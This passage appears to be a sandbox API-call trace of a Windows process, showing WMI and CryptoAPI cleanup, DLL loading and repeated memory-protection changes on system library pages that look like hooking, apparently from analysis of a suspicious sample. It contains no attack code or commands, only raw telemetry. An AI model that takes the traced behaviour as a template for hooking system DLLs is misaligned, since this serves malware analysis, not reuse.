0x0 [0210.713] IUnknown:Release (This=0x6027e50) returned 0x0 [0210.713] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0210.714] CryptDestroyKey (hKey=0xb7f150) returned 1 [0210.714] CryptReleaseContext (hProv=0xbe0360, dwFlags=0x0) returned 1 [0210.714] CryptReleaseContext (hProv=0xbe0360, dwFlags=0x0) returned 1 [0210.714] CryptDestroyKey (hKey=0xb7fc90) returned 1 [0210.714] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0211.235] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0211.235] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0211.235] WbemLocator:IUnknown:Release (This=0x6027390) returned 0x1 [0211.235] WbemLocator:IUnknown:Release (This=0x6027390) returned 0x0 [0211.236] CryptDestroyKey (hKey=0xb7f250) returned 1 [0211.236] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0211.236] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0211.757] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0211.757] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0211.757] WbemLocator:IUnknown:Release (This=0x6027290) returned 0x1 [0211.757] WbemLocator:IUnknown:Release (This=0x6027290) returned 0x0 [0211.758] CryptDestroyKey (hKey=0xb7f890) returned 1 [0211.758] CryptReleaseContext (hProv=0xbdf480, dwFlags=0x0) returned 1 [0211.758] CryptReleaseContext (hProv=0xbdf480, dwFlags=0x0) returned 1 [0212.443] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0212.443] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0212.444] WbemLocator:IUnknown:Release (This=0x60271a0) returned 0x1 [0212.444] WbemLocator:IUnknown:Release (This=0x60271a0) returned 0x0 [0212.444] IUnknown:Release (This=0x60287e0) returned 0x0 [0212.444] CryptDestroyKey (hKey=0xb7f110) returned 1 [0212.444] CryptReleaseContext (hProv=0xbe11b8, dwFlags=0x0) returned 1 [0212.444] CryptReleaseContext (hProv=0xbe11b8, dwFlags=0x0) returned 1 [0212.444] CryptDestroyKey (hKey=0xb7fb10) returned 1 [0212.444] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0212.445] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0212.899] CryptDestroyKey (hKey=0xb7f290) returned 1 [0212.899] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0212.899] CryptDestroyKey (hKey=0xb7fa50) returned 1 [0212.899] CryptReleaseContext (hProv=0xbe0470, dwFlags=0x0) returned 1 [0212.900] CryptReleaseContext (hProv=0xbe0470, dwFlags=0x0) returned 1 [0212.900] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0213.442] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0213.442] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0213.442] WbemLocator:IUnknown:Release (This=0x6027480) returned 0x1 [0213.442] WbemLocator:IUnknown:Release (This=0x6027480) returned 0x0 [0213.442] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0213.442] WbemLocator:IUnknown:Release (This=0x6027410) returned 0x1 [0213.442] WbemLocator:IUnknown:Release (This=0x6027410) returned 0x0 [0213.442] CryptDestroyKey (hKey=0xb7f290) returned 1 [0213.442] CryptReleaseContext (hProv=0xbe11b8, dwFlags=0x0) returned 1 [0213.442] CryptReleaseContext (hProv=0xbe11b8, dwFlags=0x0) returned 1 [0213.443] CryptDestroyKey (hKey=0xb7f410) returned 1 [0213.443] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0213.443] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0214.215] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0214.215] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.215] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x1 [0214.215] WbemLocator:IUnknown:Release (This=0x6033794) returned 0x0 [0214.253] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.253] WbemLocator:IUnknown:Release (This=0x60271e0) returned 0x1 [0214.253] WbemLocator:IUnknown:Release (This=0x60271e0) returned 0x0 [0214.253] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.253] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x1 [0214.254] WbemLocator:IUnknown:Release (This=0x6033634) returned 0x0 [0214.254] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.254] WbemLocator:IUnknown:Release (This=0xb5b064) returned 0x1 [0214.254] WbemLocator:IUnknown:Release (This=0x6033164) returned 0x0 [0214.254] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.254] WbemLocator:IUnknown:Release (This=0xb5b514) returned 0x1 [0214.255] WbemLocator:IUnknown:Release (This=0x603305c) returned 0x0 [0214.255] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.255] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x1 [0214.255] WbemLocator:IUnknown:Release (This=0x6033214) returned 0x0 [0214.255] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.255] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x1 [0214.255] WbemLocator:IUnknown:Release (This=0x6033844) returned 0x0 [0214.256] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.256] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x1 [0214.256] WbemLocator:IUnknown:Release (This=0x603331c) returned 0x0 [0214.256] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.256] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x1 [0214.256] WbemLocator:IUnknown:Release (This=0x603373c) returned 0x0 [0214.257] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.257] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x1 [0214.257] WbemLocator:IUnknown:Release (This=0x60335dc) returned 0x0 [0214.257] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.257] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x1 [0214.257] WbemLocator:IUnknown:Release (This=0x60332c4) returned 0x0 [0214.258] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.258] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x1 [0214.258] WbemLocator:IUnknown:Release (This=0x60331bc) returned 0x0 [0214.258] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.258] WbemLocator:IUnknown:Release (This=0xb5b604) returned 0x1 [0214.259] WbemLocator:IUnknown:Release (This=0x603352c) returned 0x0 [0214.259] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0214.259] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.259] WbemDefPath:IUnknown:Release (This=0x6029d50) returned 0x1 [0214.259] WbemDefPath:IUnknown:Release (This=0x6029d50) returned 0x0 [0214.259] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.259] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x1 [0214.259] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x0 [0214.259] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.259] WbemDefPath:IUnknown:Release (This=0x602a220) returned 0x1 [0214.259] WbemDefPath:IUnknown:Release (This=0x602a220) returned 0x0 [0214.259] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.259] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x1 [0214.259] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x0 [0214.259] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.260] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x1 [0214.260] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x0 [0214.260] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.260] WbemDefPath:IUnknown:Release (This=0x602a1b0) returned 0x1 [0214.260] WbemDefPath:IUnknown:Release (This=0x602a1b0) returned 0x0 [0214.260] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.260] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x1 [0214.260] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x0 [0214.260] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.260] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x1 [0214.260] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x0 [0214.260] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.260] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x1 [0214.260] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x0 [0214.260] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.260] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x1 [0214.260] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x0 [0214.260] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.260] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x1 [0214.260] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x0 [0214.260] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.260] WbemDefPath:IUnknown:Release (This=0x6030940) returned 0x1 [0214.260] WbemDefPath:IUnknown:Release (This=0x6030940) returned 0x0 [0214.260] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.260] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x1 [0214.260] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x0 [0214.261] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.261] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x1 [0214.261] WbemDefPath:IUnknown:Release (This=0x6030a90) returned 0x0 [0214.261] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.261] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x1 [0214.261] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x0 [0214.261] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.261] WbemDefPath:IUnknown:Release (This=0x6031350) returned 0x1 [0214.261] WbemDefPath:IUnknown:Release (This=0x6031350) returned 0x0 [0214.261] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.261] WbemDefPath:IUnknown:Release (This=0x60312e0) returned 0x1 [0214.261] WbemDefPath:IUnknown:Release (This=0x60312e0) returned 0x0 [0214.261] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.261] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x1 [0214.261] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x0 [0214.261] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.261] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x1 [0214.261] WbemDefPath:IUnknown:Release (This=0x60309b0) returned 0x0 [0214.261] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.261] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x1 [0214.261] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x0 [0214.261] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.261] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x1 [0214.261] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x0 [0214.261] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.262] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x1 [0214.262] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x0 [0214.262] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.262] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x1 [0214.262] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x0 [0214.262] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.262] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x1 [0214.262] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x0 [0214.262] IUnknown:Release (This=0x60287e0) returned 0x0 [0214.262] IUnknown:Release (This=0x6028b10) returned 0x0 [0214.262] IUnknown:Release (This=0x6027fe8) returned 0x0 [0214.263] IUnknown:Release (This=0x6027e50) returned 0x0 [0214.263] CryptDestroyKey (hKey=0xb7f610) returned 1 [0214.263] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0214.264] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0214.264] CryptDestroyKey (hKey=0xb7fb10) returned 1 [0214.264] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0214.264] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0214.265] CryptDestroyKey (hKey=0xb7f050) returned 1 [0214.265] CryptReleaseContext (hProv=0xbe0c68, dwFlags=0x0) returned 1 [0214.265] CryptReleaseContext (hProv=0xbe0c68, dwFlags=0x0) returned 1 [0214.972] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0214.972] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.972] WbemLocator:IUnknown:Release (This=0x6027270) returned 0x1 [0214.972] WbemLocator:IUnknown:Release (This=0x6027270) returned 0x0 [0214.972] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0214.972] WbemLocator:IUnknown:Release (This=0x6027250) returned 0x1 [0214.972] WbemLocator:IUnknown:Release (This=0x6027250) returned 0x0 [0214.972] CryptDestroyKey (hKey=0xb7f4d0) returned 1 [0214.972] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0214.972] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0214.973] CryptDestroyKey (hKey=0xb7f310) returned 1 [0214.973] CryptReleaseContext (hProv=0xbe11b8, dwFlags=0x0) returned 1 [0214.973] CryptReleaseContext (hProv=0xbe11b8, dwFlags=0x0) returned 1 Thread: id = 6 os_tid = 0x7e0 Thread: id = 7 os_tid = 0x7e4 [0080.763] SysReAllocStringLen (in: pbstr=0x58af62c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x58af62c*="KERNEL32.DLL") returned 1 [0080.763] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0080.763] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0080.765] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0080.766] SysReAllocStringLen (in: pbstr=0x58af62c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x58af62c*="KERNEL32.DLL") returned 1 [0080.766] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0080.766] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0080.768] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0080.769] SysReAllocStringLen (in: pbstr=0x58af608*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x58af608*="KERNEL32.DLL") returned 1 [0080.769] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0080.769] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0080.771] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0080.773] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0176.381] SysReAllocStringLen (in: pbstr=0x58af784*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x58af784*="KERNEL32.DLL") returned 1 [0176.381] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0176.381] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0176.384] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0176.385] GetCurrentThreadId () returned 0x7e4 [0176.385] ResetEvent (hEvent=0xb8) returned 1 [0176.385] GetCurrentThreadId () returned 0x7e4 [0176.385] GetCurrentThreadId () returned 0x7e4 [0176.385] GetCurrentThreadId () returned 0x7e4 [0176.385] GetCurrentThreadId () returned 0x7e4 [0176.385] ResetEvent (hEvent=0xb8) returned 1 [0176.385] GetCurrentThreadId () returned 0x7e4 [0176.385] GetCurrentThreadId () returned 0x7e4 [0176.385] SetEvent (hEvent=0xbc) returned 1 [0176.385] SetEvent (hEvent=0xb8) returned 1 [0176.385] CloseHandle (hObject=0x27c) returned 1 [0176.385] GetCurrentThreadId () returned 0x7e4 [0176.385] ResetEvent (hEvent=0xb8) returned 1 [0176.385] GetCurrentThreadId () returned 0x7e4 [0176.385] GetCurrentThreadId () returned 0x7e4 [0176.385] GetCurrentThreadId () returned 0x7e4 [0176.385] GetCurrentThreadId () returned 0x7e4 [0176.385] ResetEvent (hEvent=0xb8) returned 1 [0176.385] GetCurrentThreadId () returned 0x7e4 [0176.385] GetCurrentThreadId () returned 0x7e4 [0176.385] SetEvent (hEvent=0xbc) returned 1 [0176.385] SetEvent (hEvent=0xb8) returned 1 [0176.386] CloseHandle (hObject=0x280) returned 1 Thread: id = 8 os_tid = 0x640 [0081.518] SysReAllocStringLen (in: pbstr=0x5b2fa04*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x5b2fa04*="KERNEL32.DLL") returned 1 [0081.518] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0081.518] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0081.520] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0081.521] SysReAllocStringLen (in: pbstr=0x5b2fa04*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x5b2fa04*="KERNEL32.DLL") returned 1 [0081.521] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0081.521] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0081.523] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0081.523] SysReAllocStringLen (in: pbstr=0x5b2f9e0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x5b2f9e0*="KERNEL32.DLL") returned 1 [0081.523] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0081.524] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0081.526] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0081.528] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0112.791] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=9, lpWideCharStr=0x5b2eb8c, cchWideChar=2047 | out: lpWideCharStr="ole32.dll") returned 9 [0112.791] SysReAllocStringLen (in: pbstr=0x5b2fb90*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x5b2fb90*="ole32.dll") returned 1 [0112.791] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0112.791] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0112.791] GetLastError () returned 0x0 [0112.791] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0112.792] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0112.792] GetModuleFileNameA (in: hModule=0x76620000, lpFilename=0x5b2fa78, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0112.792] GetCurrentProcess () returned 0xffffffff [0112.792] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2fb7c*=0x766214a0, NumberOfBytesToProtect=0x5b2fb80, NewAccessProtection=0x4, OldAccessProtection=0x5b2fbb4 | out: BaseAddress=0x5b2fb7c*=0x76621000, NumberOfBytesToProtect=0x5b2fb80, OldAccessProtection=0x5b2fbb4*=0x20) returned 0x0 [0112.792] GetCurrentProcess () returned 0xffffffff [0112.792] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2fb7c*=0x766214a0, NumberOfBytesToProtect=0x5b2fb80, NewAccessProtection=0x20, OldAccessProtection=0x5b2fbb4 | out: BaseAddress=0x5b2fb7c*=0x76621000, NumberOfBytesToProtect=0x5b2fb80, OldAccessProtection=0x5b2fbb4*=0x4) returned 0x0 [0112.793] GetCurrentProcess () returned 0xffffffff [0112.793] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2fb7c*=0x766214b0, NumberOfBytesToProtect=0x5b2fb80, NewAccessProtection=0x4, OldAccessProtection=0x5b2fbb4 | out: BaseAddress=0x5b2fb7c*=0x76621000, NumberOfBytesToProtect=0x5b2fb80, OldAccessProtection=0x5b2fbb4*=0x20) returned 0x0 [0112.793] GetCurrentProcess () returned 0xffffffff [0112.793] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2fb7c*=0x766214b0, NumberOfBytesToProtect=0x5b2fb80, NewAccessProtection=0x20, OldAccessProtection=0x5b2fbb4 | out: BaseAddress=0x5b2fb7c*=0x76621000, NumberOfBytesToProtect=0x5b2fb80, OldAccessProtection=0x5b2fbb4*=0x4) returned 0x0 [0112.793] GetCurrentProcess () returned 0xffffffff [0112.793] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2fb7c*=0x766219a8, NumberOfBytesToProtect=0x5b2fb80, NewAccessProtection=0x4, OldAccessProtection=0x5b2fbb4 | out: BaseAddress=0x5b2fb7c*=0x76621000, NumberOfBytesToProtect=0x5b2fb80, OldAccessProtection=0x5b2fbb4*=0x20) returned 0x0 [0112.794] GetCurrentProcess () returned 0xffffffff [0112.794] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2fb7c*=0x766219a8, NumberOfBytesToProtect=0x5b2fb80, NewAccessProtection=0x20, OldAccessProtection=0x5b2fbb4 | out: BaseAddress=0x5b2fb7c*=0x76621000, NumberOfBytesToProtect=0x5b2fb80, OldAccessProtection=0x5b2fbb4*=0x4) returned 0x0 [0112.794] GetCurrentProcess () returned 0xffffffff [0112.794] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2fb7c*=0x766219ac, NumberOfBytesToProtect=0x5b2fb80, NewAccessProtection=0x4, OldAccessProtection=0x5b2fbb4 | out: BaseAddress=0x5b2fb7c*=0x76621000, NumberOfBytesToProtect=0x5b2fb80, OldAccessProtection=0x5b2fbb4*=0x20) returned 0x0 [0112.794] GetCurrentProcess () returned 0xffffffff [0112.794] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2fb7c*=0x766219ac, NumberOfBytesToProtect=0x5b2fb80, NewAccessProtection=0x20, OldAccessProtection=0x5b2fbb4 | out: BaseAddress=0x5b2fb7c*=0x76621000, NumberOfBytesToProtect=0x5b2fb80, OldAccessProtection=0x5b2fbb4*=0x4) returned 0x0 [0112.794] GetCurrentProcess () returned 0xffffffff [0112.794] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2fb7c*=0x76621a00, NumberOfBytesToProtect=0x5b2fb80, NewAccessProtection=0x4, OldAccessProtection=0x5b2fbb4 | out: BaseAddress=0x5b2fb7c*=0x76621000, NumberOfBytesToProtect=0x5b2fb80, OldAccessProtection=0x5b2fbb4*=0x20) returned 0x0 [0112.795] GetCurrentProcess () returned 0xffffffff [0112.795] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2fb7c*=0x76621a00, NumberOfBytesToProtect=0x5b2fb80, NewAccessProtection=0x20, OldAccessProtection=0x5b2fbb4 | out: BaseAddress=0x5b2fb7c*=0x76621000, NumberOfBytesToProtect=0x5b2fb80, OldAccessProtection=0x5b2fbb4*=0x4) returned 0x0 [0112.795] SetLastError (dwErrCode=0x0) [0112.795] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeEx") returned 0x766609ad [0112.795] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=8, lpWideCharStr=0x5b2ec0c, cchWideChar=2047 | out: lpWideCharStr="advapi32ֲ") returned 8 [0112.796] SysReAllocStringLen (in: pbstr=0x5b2fc10*=0x0, psz="advapi32", len=0x8 | out: pbstr=0x5b2fc10*="advapi32") returned 1 [0112.796] CharLowerBuffW (in: lpsz="advapi32", cchLength=0x8 | out: lpsz="advapi32") returned 0x8 [0112.796] GetModuleHandleA (lpModuleName="advapi32") returned 0x77710000 [0112.796] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteTreeA") returned 0x777534b3 [0112.796] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteTreeW") returned 0x777534a3 [0112.797] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemAlloc") returned 0x7666ea4c [0112.797] GetProcAddress (hModule=0x76620000, lpProcName="StringFromIID") returned 0x76633d96 [0112.815] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ae8, cbMultiByte=7, lpWideCharStr=0x5b2e9ec, cchWideChar=2047 | out: lpWideCharStr="NSI.dll") returned 7 [0112.815] SysReAllocStringLen (in: pbstr=0x5b2f9f0*=0x0, psz="NSI.dll", len=0x7 | out: pbstr=0x5b2f9f0*="NSI.dll") returned 1 [0112.815] CharLowerBuffW (in: lpsz="NSI.dll", cchLength=0x7 | out: lpsz="nsi.dll") returned 0x7 [0112.815] LoadLibraryExA (lpLibFileName="NSI.dll", hFile=0x0, dwFlags=0x0) returned 0x77c10000 [0112.816] GetLastError () returned 0x0 [0112.816] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0112.816] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0112.816] GetModuleFileNameA (in: hModule=0x77c10000, lpFilename=0x5b2f8d8, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\NSI.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")) returned 0x1b [0112.816] GetCurrentProcess () returned 0xffffffff [0112.816] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f9dc*=0x77c1101c, NumberOfBytesToProtect=0x5b2f9e0, NewAccessProtection=0x4, OldAccessProtection=0x5b2fa14 | out: BaseAddress=0x5b2f9dc*=0x77c11000, NumberOfBytesToProtect=0x5b2f9e0, OldAccessProtection=0x5b2fa14*=0x20) returned 0x0 [0112.817] GetCurrentProcess () returned 0xffffffff [0112.817] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f9dc*=0x77c1101c, NumberOfBytesToProtect=0x5b2f9e0, NewAccessProtection=0x20, OldAccessProtection=0x5b2fa14 | out: BaseAddress=0x5b2f9dc*=0x77c11000, NumberOfBytesToProtect=0x5b2f9e0, OldAccessProtection=0x5b2fa14*=0x4) returned 0x0 [0112.817] GetCurrentProcess () returned 0xffffffff [0112.817] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f9dc*=0x77c11024, NumberOfBytesToProtect=0x5b2f9e0, NewAccessProtection=0x4, OldAccessProtection=0x5b2fa14 | out: BaseAddress=0x5b2f9dc*=0x77c11000, NumberOfBytesToProtect=0x5b2f9e0, OldAccessProtection=0x5b2fa14*=0x20) returned 0x0 [0112.817] GetCurrentProcess () returned 0xffffffff [0112.817] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x5b2f9dc*=0x77c11024, 